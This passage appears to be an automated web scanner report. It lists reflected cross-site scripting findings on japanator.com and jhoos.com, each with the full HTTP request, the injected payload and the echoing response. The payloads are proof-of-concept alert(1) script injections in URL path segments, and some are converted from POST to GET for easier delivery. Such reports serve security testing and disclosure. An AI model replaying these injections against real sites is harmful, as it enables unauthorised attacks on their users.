GET /elephant9e6c0"><script>alert(1)</script>555ac0fda78/index_cblogs-mini.phtml?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:02:50 GMT
Server: lighttpd/1.4.28
Content-Length: 112292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant9e6c0"><script>alert(1)</script>555ac0fda78/index_cblogs-mini.phtml?y=community&cblogs=1&start=8&skip=features">
...[SNIP]...

7.63. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f287"><script>alert(1)</script>a7d08cc387 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/index_cblogs-mini.phtml6f287"><script>alert(1)</script>a7d08cc387?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:03:14 GMT
Server: lighttpd/1.4.28
Content-Length: 112291


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/index_cblogs-mini.phtml6f287"><script>alert(1)</script>a7d08cc387?y=community&cblogs=1&start=8&skip=features">
...[SNIP]...

7.64. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2fa6"><script>alert(1)</script>af94a2890d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephantc2fa6"><script>alert(1)</script>af94a2890d1/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:59:49 GMT
Server: lighttpd/1.4.28
Content-Length: 112259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephantc2fa6"><script>alert(1)</script>af94a2890d1/login.phtml?start=8&skip=features">
...[SNIP]...

7.65. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78865"><script>alert(1)</script>7ffcce37a66c81351 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /elephant78865"><script>alert(1)</script>7ffcce37a66c81351/login.phtml?back_to=&email_address=&password=&login=Login HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
Cache-Control: max-age=0
Origin: http://www.japanator.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:08:06 GMT
Server: lighttpd/1.4.28
Content-Length: 112355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant78865"><script>alert(1)</script>7ffcce37a66c81351/login.phtml?back_to=&email_address=&password=&login=Login&start=8&skip=features">
...[SNIP]...

7.66. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3961b"><script>alert(1)</script>5c60c7d19bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/login.phtml3961b"><script>alert(1)</script>5c60c7d19bc HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:00:10 GMT
Server: lighttpd/1.4.28
Content-Length: 112259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/login.phtml3961b"><script>alert(1)</script>5c60c7d19bc?start=8&skip=features">
...[SNIP]...

7.67. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f69cc"><script>alert(1)</script>bf717c8e8da60b310 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /elephant/login.phtmlf69cc"><script>alert(1)</script>bf717c8e8da60b310?back_to=&email_address=&password=&login=Login HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
Cache-Control: max-age=0
Origin: http://www.japanator.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:08:29 GMT
Server: lighttpd/1.4.28
Content-Length: 112355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/login.phtmlf69cc"><script>alert(1)</script>bf717c8e8da60b310?back_to=&email_address=&password=&login=Login&start=8&skip=features">
...[SNIP]...

7.68. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b02ca"><script>alert(1)</script>24e2481c18d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephantb02ca"><script>alert(1)</script>24e2481c18d/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:08:47 GMT
Server: lighttpd/1.4.28
Content-Length: 112304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephantb02ca"><script>alert(1)</script>24e2481c18d/signup.phtml?start=8&skip=features">
...[SNIP]...

7.69. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12814"><script>alert(1)</script>d51c9eb6be2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/signup.phtml12814"><script>alert(1)</script>d51c9eb6be2 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:09:10 GMT
Server: lighttpd/1.4.28
Content-Length: 112304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/signup.phtml12814"><script>alert(1)</script>d51c9eb6be2?start=8&skip=features">
...[SNIP]...

7.70. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49269"><script>alert(1)</script>83ecb4f0d39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant49269"><script>alert(1)</script>83ecb4f0d39/templates/features.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:52 GMT
Server: lighttpd/1.4.28
Content-Length: 112282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant49269"><script>alert(1)</script>83ecb4f0d39/templates/features.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.71. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18bd8"><script>alert(1)</script>8bddb78b326 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates18bd8"><script>alert(1)</script>8bddb78b326/features.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:15 GMT
Server: lighttpd/1.4.28
Content-Length: 112282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates18bd8"><script>alert(1)</script>8bddb78b326/features.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.72. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a879d"><script>alert(1)</script>cba7f3ca990 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates/features.cssa879d"><script>alert(1)</script>cba7f3ca990?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:40 GMT
Server: lighttpd/1.4.28
Content-Length: 112282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates/features.cssa879d"><script>alert(1)</script>cba7f3ca990?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.73. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90f24"><script>alert(1)</script>50354e47f21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant90f24"><script>alert(1)</script>50354e47f21/templates/styles2011.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:54 GMT
Server: lighttpd/1.4.28
Content-Length: 112284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant90f24"><script>alert(1)</script>50354e47f21/templates/styles2011.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.74. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c144"><script>alert(1)</script>851007136eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates2c144"><script>alert(1)</script>851007136eb/styles2011.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:16 GMT
Server: lighttpd/1.4.28
Content-Length: 112284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates2c144"><script>alert(1)</script>851007136eb/styles2011.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.75. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 939e9"><script>alert(1)</script>da3114cdcf2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates/styles2011.css939e9"><script>alert(1)</script>da3114cdcf2?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:40 GMT
Server: lighttpd/1.4.28
Content-Length: 112284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates/styles2011.css939e9"><script>alert(1)</script>da3114cdcf2?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.76. http://www.japanator.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c63b"><script>alert(1)</script>46c4dffc34d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4c63b"><script>alert(1)</script>46c4dffc34d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.japanator.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 00:15:04 GMT
Server: lighttpd/1.4.28
Content-Length: 112248


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/favicon.ico4c63b"><script>alert(1)</script>46c4dffc34d?start=8&skip=features">
...[SNIP]...

7.77. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jhoos.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9bd4"-alert(1)-"de46a400726 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof9bd4"-alert(1)-"de46a400726 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jhoos.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Set-Cookie: PHPSESSID=g0ij568rmka3ulclrpt5nhoec4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.jhoos.com/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-type: text/html
Date: Sun, 01 May 2011 23:37:17 GMT
Server: lighttpd/1.4.28-devel-485M
Content-Length: 6926

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Social Networking Services in Favicon.icof9bd4"-alert(1)-"de46a400726</TITLE>
<meta name="description" content="Jho
...[SNIP]...
<script type="text/javascript">
function vp(uname)
{
   window.location.href = "http://profiles.jhoos.com/"+uname;
}
function pg(pg)
{
   window.location.href = "http://www.jhoos.com/favicon.icof9bd4"-alert(1)-"de46a400726--"+pg;
}
</script>
...[SNIP]...

7.78. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jhoos.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17e5b<a>fb17bacaecf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

